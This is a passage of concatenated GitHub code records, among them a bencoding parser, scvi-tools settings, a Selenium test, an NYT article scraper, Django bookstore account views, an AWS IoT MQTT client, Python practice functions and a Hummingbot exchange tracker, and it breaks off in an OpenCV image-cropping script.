!= b'i':\n raise ValueError()\n\n negative = stream.next_item == b'-'\n\n if negative:\n next(stream)\n\n result = int(consume_number(stream))\n\n if negative:\n result *= -1\n\n if negative and result == 0:\n raise ValueError('Negative zero is not allowed')\n\n if next(stream) != b'e':\n raise ValueError('Unterminated integer')\n\n return result\n\n\ndef consume_str(stream):\n length = int(consume_number(stream))\n\n if next(stream) != b':':\n raise ValueError('Malformed string')\n\n result = b''\n\n for _ in range(length):\n try:\n result += next(stream)\n except StopIteration:\n raise ValueError('Invalid string length')\n\n return result\n\n\ndef consume_list(stream):\n if next(stream) != b'l':\n raise ValueError()\n\n l = []\n\n while stream.next_item != b'e':\n l.append(consume(stream))\n\n if next(stream) != b'e':\n raise ValueError('Unterminated list')\n\n return l\n\n\ndef consume_dict(stream):\n if next(stream) != b'd':\n raise ValueError()\n\n d = {}\n\n while stream.next_item != b'e':\n key = consume(stream)\n value = consume(stream)\n d[key] = value\n\n if next(stream) != b'e':\n raise ValueError('Unterminated dictionary')\n\n return d\n","repo_name":"yang-le/bt","sub_path":"bencoding.py","file_name":"bencoding.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18019424299","text":"# Starter Code\nclass Solution:\n def calculate_degree(self, hours, minutes):\n angle = 10.56\n # Write your code here without removing the existing code\n # 'hours' and 'minutes' are input variables in integer format.\n # modify the double 'angle' to contain the output of the program.\n return angle\n\n\nif __name__ == '__main__':\n n = int(input())\n m = int(input())\n x = Solution()\n ans = x.calculate_degree(n, m)\n print(\"%.5f\" % ans)\n","repo_name":"Kartikay123/Problem-Setter-Intern","sub_path":"clock/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"33068502781","text":"import logging\nimport os\nfrom pathlib import Path\nfrom typing import Literal, Optional, Union\n\nimport torch\nfrom lightning.pytorch import seed_everything\nfrom rich.console import Console\nfrom rich.logging import RichHandler\n\nscvi_logger = logging.getLogger(\"scvi\")\n\n\nclass ScviConfig:\n \"\"\"Config manager for scvi-tools.\n\n Examples\n --------\n To set the seed\n\n >>> scvi.settings.seed = 1\n\n To set the batch size for functions like `SCVI.get_latent_representation`\n\n >>> scvi.settings.batch_size = 1024\n\n To set the progress bar style, choose one of \"rich\", \"tqdm\"\n\n >>> scvi.settings.progress_bar_style = \"rich\"\n\n To set the verbosity\n\n >>> import logging\n >>> scvi.settings.verbosity = logging.INFO\n\n To set the number of threads PyTorch will use\n\n >>> scvi.settings.num_threads = 2\n\n To prevent Jax from preallocating GPU memory on start (default)\n\n >>> scvi.settings.jax_preallocate_gpu_memory = False\n \"\"\"\n\n def __init__(\n self,\n verbosity: int = logging.INFO,\n progress_bar_style: Literal[\"rich\", \"tqdm\"] = \"tqdm\",\n batch_size: int = 128,\n seed: Optional[int] = None,\n logging_dir: str = \"./scvi_log/\",\n dl_num_workers: int = 0,\n jax_preallocate_gpu_memory: bool = False,\n warnings_stacklevel: int = 2,\n ):\n self.warnings_stacklevel = warnings_stacklevel\n self.seed = seed\n self.batch_size = batch_size\n if progress_bar_style not in [\"rich\", 
\"tqdm\"]:\n raise ValueError(\"Progress bar style must be in ['rich', 'tqdm']\")\n self.progress_bar_style = progress_bar_style\n self.logging_dir = logging_dir\n self.dl_num_workers = dl_num_workers\n self._num_threads = None\n self.jax_preallocate_gpu_memory = jax_preallocate_gpu_memory\n self.verbosity = verbosity\n\n @property\n def batch_size(self) -> int:\n \"\"\"Minibatch size for loading data into the model.\n\n This is only used after a model is trained. Trainers have specific\n `batch_size` parameters.\n \"\"\"\n return self._batch_size\n\n @batch_size.setter\n def batch_size(self, batch_size: int):\n \"\"\"Minibatch size for loading data into the model.\n\n This is only used after a model is trained. Trainers have specific\n `batch_size` parameters.\n \"\"\"\n self._batch_size = batch_size\n\n @property\n def dl_num_workers(self) -> int:\n \"\"\"Number of workers for PyTorch data loaders (Default is 0).\"\"\"\n return self._dl_num_workers\n\n @dl_num_workers.setter\n def dl_num_workers(self, dl_num_workers: int):\n \"\"\"Number of workers for PyTorch data loaders (Default is 0).\"\"\"\n self._dl_num_workers = dl_num_workers\n\n @property\n def logging_dir(self) -> Path:\n \"\"\"Directory for training logs (default `'./scvi_log/'`).\"\"\"\n return self._logging_dir\n\n @logging_dir.setter\n def logging_dir(self, logging_dir: Union[str, Path]):\n self._logging_dir = Path(logging_dir).resolve()\n\n @property\n def num_threads(self) -> None:\n \"\"\"Number of threads PyTorch will use.\"\"\"\n return self._num_threads\n\n @num_threads.setter\n def num_threads(self, num: int):\n \"\"\"Number of threads PyTorch will use.\"\"\"\n self._num_threads = num\n torch.set_num_threads(num)\n\n @property\n def progress_bar_style(self) -> str:\n \"\"\"Library to use for progress bar.\"\"\"\n return self._pbar_style\n\n @progress_bar_style.setter\n def progress_bar_style(self, pbar_style: Literal[\"tqdm\", \"rich\"]):\n \"\"\"Library to use for progress bar.\"\"\"\n self._pbar_style = pbar_style\n\n @property\n def seed(self) -> int:\n \"\"\"Random seed for torch and numpy.\"\"\"\n return self._seed\n\n @seed.setter\n def seed(self, seed: Union[int, None] = None):\n \"\"\"Random seed for torch and numpy.\"\"\"\n if seed is None:\n self._seed = None\n else:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n seed_everything(seed)\n self._seed = seed\n\n @property\n def verbosity(self) -> int:\n \"\"\"Verbosity level (default `logging.INFO`).\"\"\"\n return self._verbosity\n\n @verbosity.setter\n def verbosity(self, level: Union[str, int]):\n \"\"\"Sets logging configuration for scvi based on chosen level of verbosity.\n\n If \"scvi\" logger has no StreamHandler, add one.\n Else, set its level to `level`.\n\n Parameters\n ----------\n level\n Sets \"scvi\" logging level to `level`\n force_terminal\n Rich logging option, set to False if piping to file output.\n \"\"\"\n self._verbosity = level\n scvi_logger.setLevel(level)\n if len(scvi_logger.handlers) == 0:\n console = Console(force_terminal=True)\n if console.is_jupyter is True:\n console.is_jupyter = False\n ch = RichHandler(\n level=level, show_path=False, console=console, show_time=False\n )\n formatter = logging.Formatter(\"%(message)s\")\n ch.setFormatter(formatter)\n scvi_logger.addHandler(ch)\n else:\n scvi_logger.setLevel(level)\n\n @property\n def warnings_stacklevel(self) -> int:\n \"\"\"Stacklevel for warnings.\"\"\"\n return self._warnings_stacklevel\n\n @warnings_stacklevel.setter\n def 
warnings_stacklevel(self, stacklevel: int):\n \"\"\"Stacklevel for warnings.\"\"\"\n self._warnings_stacklevel = stacklevel\n\n def reset_logging_handler(self):\n \"\"\"Resets \"scvi\" log handler to a basic RichHandler().\n\n This is useful if piping outputs to a file.\n \"\"\"\n scvi_logger.removeHandler(scvi_logger.handlers[0])\n ch = RichHandler(level=self._verbosity, show_path=False, show_time=False)\n formatter = logging.Formatter(\"%(message)s\")\n ch.setFormatter(formatter)\n scvi_logger.addHandler(ch)\n\n @property\n def jax_preallocate_gpu_memory(self):\n \"\"\"Jax GPU memory allocation settings.\n\n If False, Jax will only preallocate GPU memory it needs.\n If float in (0, 1), Jax will preallocate GPU memory to that\n fraction of the GPU memory.\n \"\"\"\n return self._jax_gpu\n\n @jax_preallocate_gpu_memory.setter\n def jax_preallocate_gpu_memory(self, value: Union[float, bool]):\n # see https://jax.readthedocs.io/en/latest/gpu_memory_allocation.html#gpu-memory-allocation\n if value is False:\n os.environ[\"XLA_PYTHON_CLIENT_PREALLOCATE\"] = \"false\"\n elif isinstance(value, float):\n if value >= 1 or value <= 0:\n raise ValueError(\"Need to use a value between 0 and 1\")\n # format is \".XX\"\n os.environ[\"XLA_PYTHON_CLIENT_MEM_FRACTION\"] = str(value)[1:4]\n else:\n raise ValueError(\"value not understood, need bool or float in (0, 1)\")\n self._jax_gpu = value\n\n\nsettings = ScviConfig()\n","repo_name":"scverse/scvi-tools","sub_path":"scvi/_settings.py","file_name":"_settings.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"}
{"seq_id":"2487046877","text":"import unittest\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver import FirefoxProfile\n\n# A sample of using FireMobileSimulator with Selenium\n#\n# refs:\n# [Makochi's technical notes: integrating Selenium and FireMobileSimulator](http://wavetalker.blog134.fc2.com/blog-entry-76.html)\n# [A must-read for anyone building a feature-phone environment with selenium! How to run FireMobileSimulator with selenium on mac \\\\- Qiita](http://qiita.com/hayakawatomoaki/items/6be743ba98cd8ad41248)\nclass GoogleTestCase(unittest.TestCase):\n\n def setUp(self):\n profile = FirefoxProfile(self.getProfileData());\n self.browser = webdriver.Firefox(profile)\n self.addCleanup(self.browser.quit)\n\n def getProfileData(self):\n # Read from a file; assumes the first line contains the full path of the profile\n f = open('.FireMobileSimulatorSettings')\n lines = f.read()\n f.close()\n lineArray = lines.split('\\n')\n for line in lineArray:\n return line\n return\n\n def testPageOpen(self):\n self.browser.get('http://google.com')\n time.sleep(3)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nabeen/selenium-python","sub_path":"for_firefox_driver/firemobile_simulator_test.py","file_name":"firemobile_simulator_test.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28061382413","text":"import bs4\nimport json\nimport requests\nfrom pymongo import MongoClient\nfrom pymongo.errors import DuplicateKeyError, CollectionInvalid\nimport datetime as dt\nimport os\n\n# Define the MongoDB database and table\ndb_client = MongoClient()\ndb = db_client['nyt']\ntable = db['meta']\n\n# Query the NYT API once\ndef single_query(link, payload):\n response = requests.get(link, params=payload)\n if response.status_code != 200:\n print ('WARNING', response.status_code)\n if (response.status_code == 429):\n print('Uh oh. 
NYT is saying we have too many requests!')\n return {\"stop\":True}\n return None\n else:\n return response.json()\n\n# Determine if the results are more than 100 pages\ndef more_than_100_pages(total_page):\n if total_page > 100:\n pages_left = min(total_page - 100, 100)\n return 100, pages_left, True\n else:\n return total_page, 0, False\n\n# Looping through the pages give the number of pages\ndef loop_through_pages(total_pages, link, payload, table):\n for i in range(total_pages):\n if i % 50 == 0:\n print (' || Page ', i)\n payload['page'] = str(i)\n content = single_query(link, payload)\n if (content == None):\n continue\n if (\"stop\" in content.keys()):\n return\n meta_lst = content['response']['docs']\n\n for meta in meta_lst:\n try:\n table.insert_one(meta)\n except DuplicateKeyError:\n print ('Duplicate entry error in MongoDB.')\n \n# Scrape the meta data (link to article and put it into Mongo)\ndef scrape_meta(days=1):\n table.delete_many({})\n # The basic parameters for the NYT API\n link = 'http://api.nytimes.com/svc/search/v2/articlesearch.json'\n payload = {'api-key': os.environ['NYT_API_KEY']}\n\n today = dt.datetime(2015, 1, 28)\n for day in range(days):\n payload['end_date'] = str(today).replace('-','')\n half_day = today - dt.timedelta(hours=12)\n payload['begin_date'] = str(half_day).replace('-','')\n print ('Scraping period: %s - %s ' % (str(half_day), str(today)))\n\n today -= dt.timedelta(days=2)\n\n content = single_query(link, payload)\n hits = content['response']['meta']['hits']\n total_pages = hits #(hits / 10) + 1\n print ('HITS', hits)\n\n newest_sort_pages, oldest_sort_pages, grt_100 = more_than_100_pages(total_pages)\n print (newest_sort_pages, oldest_sort_pages, grt_100)\n #if grt_100:\n new_payload = payload.copy()\n old_payload = payload.copy()\n new_payload['sort']= 'newest'\n old_payload['sort'] = 'oldest'\n\n loop_through_pages(newest_sort_pages, link, new_payload, table)\n loop_through_pages(oldest_sort_pages, link, old_payload, table)\n\n# Get all the links, visit the page and scrape the content\ndef get_articles(table):\n print(\"getting articles\")\n links = table.find({},{'web_url': 1})\n\n counter = 0\n for uid_link in links:\n counter += 1\n if counter % 100 == 0:\n print ('Count: ', counter, ' ')\n print (uid)\n uid = uid_link['_id']\n link = uid_link['web_url']\n html = requests.get(link).content\n soup = bs4.BeautifulSoup(html, 'html.parser')\n #soup.pretty_print()\n if (soup):\n article_content = '\\n'.join([i.text for i in soup.select('p.story-body-text')])\n print(article_content)\n if not article_content:\n article_content = '\\n'.join([i.text for i in soup.select('.caption-text')])\n if not article_content:\n article_content = '\\n'.join([i.text for i in soup.select('[itemprop=\"description\"]')])\n if not article_content:\n article_content = '\\n'.join([i.text for i in soup.select('#nytDesignBody')])\n else:\n article_content = ''\n print(article_content)\n\n table.update({'_id': uid}, {'$set': {'raw_html': html}})\n table.update({'_id': uid}, {'$set': {'content_txt': article_content}})\n\nif __name__ == '__main__':\n scrape_meta()\n get_articles(table)\n","repo_name":"josiah-d/data_science","sub_path":"solutions/web-scraping/scraping_solns.py","file_name":"scraping_solns.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74435901032","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom django.contrib import 
messages\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import login, logout\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.urls import reverse\n\nfrom bookstore.models import Book\nfrom .models import MyUser, Address\nfrom .forms import RegistrationForm, UserEditForm, UserAddressForm\nfrom .tokens import account_activation_token\n\n@login_required\ndef wishlist(request):\n books = Book.objects.filter(user_wishlist=request.user)\n return render(request, 'account/dashboard/user_wishlist.html', {'wishlist':books})\n\n\n@login_required\ndef add_to_wishlist(request, id):\n book = get_object_or_404(Book, id=id)\n if book.user_wishlist.filter(id=request.user.id).exists():\n book.user_wishlist.remove(request.user)\n else:\n book.user_wishlist.add(request.user)\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n\ndef account_register(request):\n if request.user.is_authenticated:\n return redirect('account:dashboard')\n\n if request.method == 'POST':\n register_form = RegistrationForm(request.POST)\n if register_form.is_valid():\n user = register_form.save(commit=False)\n user.email = register_form.cleaned_data['email']\n user.set_password(register_form.cleaned_data['password'])\n user.is_active = False\n user.save()\n current_site = get_current_site(request)\n subject = 'Активация учетной записи'\n message = render_to_string('account/registration/account_activation_email.html',\n {\n 'user': user,\n 'domain': current_site,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': account_activation_token.make_token(user)\n }\n )\n user.email_user(subject=subject, message=message)\n return render(request, 'account/registration/register_email_confirm.html', {'form': register_form})\n else:\n return render(request, 'account/registration/register.html', {'form': register_form})\n else:\n register_form = RegistrationForm()\n return render(request, 'account/registration/register.html', {'form': register_form})\n \n\ndef account_activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64)\n user = MyUser.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, MyUser.DoesNotExist):\n user = None\n \n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n login(request, user)\n return redirect('account:dashboard')\n else:\n return render(request, 'account/registration/activation_invalid.html')\n\n\n@login_required\ndef dashboard(request):\n return render(request, 'account/dashboard/dashboard.html', {})\n\n@login_required\ndef edit_details(request):\n instance = request.user\n if request.method == 'POST':\n user_form = UserEditForm(request.POST, instance=instance)\n if user_form.is_valid():\n user_form.save()\n else:\n user_form = UserEditForm(instance=instance)\n return render(request, 'account/dashboard/edit_details.html', {'user_form': user_form})\n\n@login_required\ndef delete_user(request):\n user = MyUser.objects.get(username=request.user)\n user.is_active = False\n user.save()\n logout(request)\n return redirect('account:delete_confirmation')\n\n\n@login_required\ndef view_address(request):\n addresses = Address.objects.filter(owner=request.user)\n return render(request, 
'account/dashboard/addresses.html', {'addresses': addresses})\n\n@login_required\ndef add_address(request):\n if request.method =='POST':\n address_form = UserAddressForm(request.POST)\n if address_form.is_valid():\n address_form = address_form.save(commit=False)\n address_form.owner = request.user\n address_form.save()\n return HttpResponseRedirect(reverse('account:addresses'))\n else:\n return render(request, 'account/dashboard/edit_address.html', {'form':address_form})\n else:\n address_form = UserAddressForm()\n return render(request, 'account/dashboard/edit_address.html', {'form':address_form})\n\n@login_required\ndef edit_address(request, id):\n if request.method == 'POST':\n address = Address.objects.get(pk=id, owner=request.user)\n address_form = UserAddressForm(request.POST, instance=address)\n if address_form.is_valid():\n address_form.save()\n return HttpResponseRedirect(reverse('account:addresses'))\n else:\n address = Address.objects.get(pk=id, owner=request.user)\n address_form = UserAddressForm(instance=address)\n return render(request, 'account/dashboard/edit_address.html', {'form': address_form})\n\n@login_required\ndef delete_address(request, id):\n Address.objects.get(pk=id, owner=request.user).delete()\n return redirect('account:addresses')\n\n@login_required\ndef default_address(request, id):\n if Address.objects.filter(pk=id, owner=request.user, default=True):\n Address.objects.filter(pk=id, owner=request.user, default=True).update(default=False)\n else:\n Address.objects.filter(pk=id, owner=request.user).update(default=True)\n return redirect('account:addresses')","repo_name":"v-makarovskyi/book_store_django","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19029777355","text":"import os\nimport json\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\n\n\ndef _subscrib(self, params, packet):\n print('Received meessage from AWS IoT Core')\n print('Topic: ' + packet.topic)\n print('payload:', (packet.payload))\n\nclass AwsMqtt():\n\n def __init__(self,endpointurl:str,endpointport:int):\n self.endpointurl = endpointurl\n self.endpointport = endpointport\n self.pem = os.path.join( \"private\", \"AmazonRootCA1.pem\")\n self.key = os.path.join( \"private\", \"private.pem.key\")\n self.crt = os.path.join( \"private\", \"certificate.pem.crt\")\n self.client = AWSIoTMQTTClient(\"JMPV_clientid\")\n self._config()\n self.client.connect()\n\n def _config(self):\n self.client.configureEndpoint(self.endpointurl, self.endpointport)\n # Set path for Root CA and unique device credentials (use the private key and certificate retrieved from the logs in Step 1)\n self.client.configureCredentials(self.pem, self.key, self.crt)\n self.client.configureOfflinePublishQueueing(-1)\n self.client.configureDrainingFrequency(2)\n self.client.configureConnectDisconnectTimeout(10)\n self.client.configureMQTTOperationTimeout(5)\n\n\n\n def subscribe(self,topic:str):\n self.client.subscribe(topic,1,_subscrib)\n\n def publish(self,topic:str,payload:dict):\n self.client.publish(topic,json.dumps(payload),1)\n","repo_name":"miltonmce/Mau_sockets","sub_path":"src/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16405900427","text":"# Python, using Anaconda environment\n# Week 2, Day 7\nimport datetime as dt\nimport 
time\nimport math\n\ndef sum_till(x: int):\n \"\"\"\n Calculate the sum of 0 to X\n as Exercise 1 oldies\n :param x: (int) the number at the end\n :return: the sum of 0 to x\n \"\"\"\n start_time = dt.datetime.now()\n mySum = 0\n for ix in range(0, x+1):\n mySum += ix\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds() , \" seconds \")\n\n return mySum\n\n\ndef area_of_square(edge_length):\n \"\"\"\n Calculate the area of the square, given the edge length\n as Exercise 2 oldies\n :param edge_length: (float/int) the edge length of the square\n :return: the area of the square\n \"\"\"\n return edge_length**2\n\n\ndef quadrat_label(txtstr: str, number):\n \"\"\"\n Calculate the square of a number\n as Exercise 1\n :param txtstr: (str) input text as a key\n :param number: (int/float) a number\n :return:\n \"\"\"\n print(f\"The input text is {txtstr}\")\n out_number = number**2\n out_pair = {txtstr: out_number}\n\n return out_number, out_pair\n\n\ndef factorial_of(n: int):\n \"\"\"\n Calculates n! (n factorial)\n as Exercise 2\n :param n: (int) number as input for the factorial function\n :return: n factorial\n \"\"\"\n start_time = dt.datetime.now()\n out_factorial = 1\n if n > 0:\n for ix in range(1, n+1):\n out_factorial *= ix\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds(), \" seconds \")\n\n return out_factorial\n\n\ndef odd_or_even(*mylists):\n start_time = dt.datetime.now()\n # print(mylists)\n odd_list = []\n even_list = []\n for mylist in mylists:\n for ix in mylist:\n # print(ix, type(ix))\n if ix % 2 == 0:\n even_list.append(ix) # even numbers\n else:\n odd_list.append(ix) # odd numbers\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds(), \" seconds \")\n\n return even_list, odd_list\n\n\ndef character_count(strText: str):\n \"\"\"\n calculate capitals, small letters, and whitespaces in a string,\n as Exercise 6\n :param strText: (str) text as input\n :return: (dict) the result of counting\n \"\"\"\n start_time = dt.datetime.now()\n out_dict = {}\n num_of_capital = len([x for x in strText if x.isupper()])\n num_of_small_letter = len([x for x in strText if x.islower()])\n num_of_space = strText.count(\" \")\n\n out_dict[\"capital\"] = num_of_capital\n out_dict[\"small letter\"] = num_of_small_letter\n out_dict[\"whitespace\"] = num_of_space\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds(), \" seconds \")\n\n return out_dict\n\n\n# read this: https://realpython.com/python-kwargs-and-args/\n\n\ndef cone_volume(radius: float = 1.0, height: float = 1.0):\n return math.pi * radius**2 * height / 3.0\n\n\ndef sphere_volume(radius: float = 1.0):\n return math.pi * radius**3 * 4.0 / 3.0\n\n\ndef cuboid_volume(length: float = 1.0, width: float = 1.0, height: float = 1.0):\n return length * width * height\n\n\ndef cylinder_volume(radius: float = 1.0, height: float = 1.0):\n return math.pi * radius**2 * height\n\n\ndef shape_volume(fkt, *args):\n volume = fkt(*args)\n return volume\n\n\n\n","repo_name":"iscab/belajar_python","sub_path":"Course2023_alfatraining_Python_Programmierung/Woche_2/helper_func/day7func.py","file_name":"day7func.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25651298614","text":"#! 
/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages as pdfpages\n\nprint(\"Using pandas {}\".format(pd.__version__))\n\ndf = pd.read_csv('output.csv')\ndf_my = pd.read_csv('output_mybenchmark.csv')\ndef plot(args):\n\n #df = df.set_index(['symbols', 'testcase', 'type'])\n # df_average = df.groupby(['expansion', 'symbols', 'type'])['throughput'].mean()\n\n for type in args:\n expansion_df = df[df['type'] == type]\n symbols=df['symbols']\n y_scale = [1, 5, 10, 20, 50, 100, 200, 300, 1000, 2000]\n if len(expansion_df) == 0:\n print(\"Skipping full no results\")\n continue\n\n throughput = df.groupby(['expansion', 'symbols', 'testcase'])['throughput'].mean()\n throughput_my = df_my.groupby(['expansion', 'symbols', 'testcase'])['throughput'].mean()\n error = df.groupby(['expansion', 'symbols', 'testcase'])['throughput'].apply(np.std)\n # throughput = throughput.set_index(['expansion', 'symbols', 'testcase'])\n\n throughput_expansion1 = df[(df['expansion']==1) & (df['type'] == type)]\n throughput_expansion1 = throughput_expansion1.groupby(['symbols', 'testcase'])['throughput'].mean()\n throughput_expansion1 = throughput_expansion1.unstack(level = 1)\n\n m_throughput_expansion1 = df_my[(df_my['expansion'] == 1) & (df_my['type'] == type)]\n m_throughput_expansion1 = m_throughput_expansion1.groupby(['symbols', 'testcase'])['throughput'].mean()\n m_throughput_expansion1 = m_throughput_expansion1.unstack(level=1)\n\n filename = type + \"_fulcrum_kodo_mybenchmark_throughput.pdf\"\n with pdfpages(filename) as pdf:\n plt.figure()\n\n plt.plot(throughput_expansion1['FulcrumInner'], label = 'Inner r=1', color='b')\n plt.plot(throughput_expansion1['FulcrumOuter'], label = 'Outer r=1', color='r')\n plt.plot(throughput_expansion1['FulcrumCombined'], label = 'Combined r=1', color='y')\n\n plt.plot(m_throughput_expansion1['FulcrumInner'], label='My Inner r=1', color='b', linestyle='--')\n plt.plot(m_throughput_expansion1['FulcrumOuter'], label='My Outer r=1', color='r', linestyle='--')\n plt.plot(m_throughput_expansion1['FulcrumCombined'], label='My Combined r=1', color='y', linestyle='--')\n\n plt.ylabel('Throughput [Mbps]')\n plt.xlabel('Generation size')\n plt.yscale('log', linthreshy = 10)\n plt.xscale('log', basex = 2)\n plt.xticks(\n list(scipy.unique(symbols)),\n list(scipy.unique(symbols)))\n plt.yticks(list(scipy.unique(y_scale)),list(scipy.unique(y_scale)))\n plt.title('FULCRUM AND RLNC:' + type.upper())\n #\n # plt.legend(loc='center right', bbox_to_anchor= (1.3, 0.5))\n # plt.yscale('symlog', linthreshy = 10)\n # lgd=plt.legend(loc='center left', prop={\"size\":10}, bbox_to_anchor=(1,0.5))\n plt.legend(loc='best', prop={\"size\": 10})\n plt.grid(True)\n pdf.savefig(dpi =300)\n plt.close()\n # filename = type + \"_throughput.pdf\"\n # with pdfpages(filename) as pdf:\n # for expansion in throughput.index.levels[0]:\n # y = throughput[expansion].unstack('testcase')\n # yerr = error[expansion].unstack('testcase')\n # title = \"expansion={}\".format(expansion)\n # plt.figure()\n #\n # #y.plot(title=title, grid = True)\n # plt.plot(y['FulcrumInner'], linewidth=2)\n # plt.plot(y['FulcrumOuter'], linewidth=2)\n # plt.plot(y['FulcrumCombined'], linewidth=2)\n # # plt.axis([16, 1024, 10, 300]) # plt.axis([xmin, xmax, ymin, ymax])\n # plt.plot(throughput_my['Binary'])\n # plt.plot(throughput_my['Binary8'])\n # plt.ylabel('Throughput [Mbps]')\n # plt.xlabel('Generation size')\n # 
plt.yscale('log', linthreshy = 10)\n # plt.xscale('log', basex = 2)\n # plt.xticks(\n # list(scipy.unique(symbols)),\n # list(scipy.unique(symbols)))\n # plt.yticks(list(scipy.unique(y_scale)),list(scipy.unique(y_scale)))\n # plt.title(title)\n # plt.legend(loc = 'best', prop={\"size\":10}) #change the size of legend\n # plt.grid(True)\n # # plt.yscale('symlog', linthreshy = 10)\n # pdf.savefig()\n # plt.close()\n\nif __name__ == '__main__':\n args = ['encoder', 'decoder']\n plot(args)","repo_name":"nguyenvutud/kodo-fulcrum","sub_path":"plot_fulcrum_sparse/plot_kodo_mybenchmark.py","file_name":"plot_kodo_mybenchmark.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1695608443","text":"import asyncio\nimport logging\nfrom typing import Optional\n\nimport hummingbot.connector.exchange.coinflex.coinflex_constants as CONSTANTS\nfrom hummingbot.connector.exchange.coinflex.coinflex_api_user_stream_data_source import CoinflexAPIUserStreamDataSource\nfrom hummingbot.connector.exchange.coinflex.coinflex_auth import CoinflexAuth\nfrom hummingbot.core.api_throttler.async_throttler import AsyncThrottler\nfrom hummingbot.core.data_type.user_stream_tracker import UserStreamTracker\nfrom hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource\nfrom hummingbot.core.utils.async_utils import safe_ensure_future, safe_gather\nfrom hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory\nfrom hummingbot.logger import HummingbotLogger\n\n\nclass CoinflexUserStreamTracker(UserStreamTracker):\n _logger: Optional[HummingbotLogger] = None\n\n def __init__(self,\n auth: CoinflexAuth,\n domain: str = CONSTANTS.DEFAULT_DOMAIN,\n throttler: Optional[AsyncThrottler] = None,\n api_factory: Optional[WebAssistantsFactory] = None):\n super().__init__()\n self._auth: CoinflexAuth = auth\n self._ev_loop: asyncio.events.AbstractEventLoop = asyncio.get_event_loop()\n self._data_source: Optional[UserStreamTrackerDataSource] = None\n self._user_stream_tracking_task: Optional[asyncio.Task] = None\n self._domain = domain\n self._throttler = throttler\n self._api_factory = api_factory\n\n @classmethod\n def logger(cls) -> HummingbotLogger:\n if cls._logger is None:\n cls._logger = logging.getLogger(__name__)\n return cls._logger\n\n @property\n def data_source(self) -> UserStreamTrackerDataSource:\n \"\"\"\n Returns the instance of the data source that listens to the private user channel to receive updates from the\n exchange. 
If the instance is not initialized it will be created.\n :return: the user stream instance that is listening to user updates from the server using the private channel\n \"\"\"\n if not self._data_source:\n self._data_source = CoinflexAPIUserStreamDataSource(\n auth=self._auth,\n domain=self._domain,\n throttler=self._throttler,\n api_factory=self._api_factory\n )\n return self._data_source\n\n async def start(self):\n \"\"\"\n Starts the background task that connects to the exchange and listens to user activity updates\n \"\"\"\n self._user_stream_tracking_task = safe_ensure_future(\n self.data_source.listen_for_user_stream(self._ev_loop, self._user_stream)\n )\n await safe_gather(self._user_stream_tracking_task)\n","repo_name":"waterboi1729/hbot2","sub_path":"hummingbot/connector/exchange/coinflex/coinflex_user_stream_tracker.py","file_name":"coinflex_user_stream_tracker.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21841093848","text":"import os\nimport cv2\nfrom enum import Enum\n\n# define opencv cascade pre-trained models\nclass Cascade_model(Enum):\n class Face(Enum):\n Name = \"face\"\n Model = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n Scale_factor = 1.3\n Min_Neighbors = 5\n class Smile(Enum):\n Name = \"smile\"\n Model = cv2.CascadeClassifier('haarcascade_smile.xml')\n Scale_factor = 1.8\n Min_Neighbors = 20\n\n# get best size based on aspect ratio\ndef get_size_ratio(min_width, min_height, ratio = (4,3)):\n if ratio[0] > ratio[1]:\n if min_width > min_height:\n min_height = min_width * ratio[1] / ratio[0]\n else:\n min_width = min_height * ratio[0] / ratio[1]\n else:\n if min_width > min_height:\n min_height = min_width * ratio[1] / ratio[0]\n else:\n min_width = min_height * ratio[0] / ratio[1]\n return round(min_width), round(min_height)\n\n# crop parts from images and save in another folder\ndef part_croper(input_folder_path, target_folder_path, cascade_model, should_resize = False, height = 128, width = 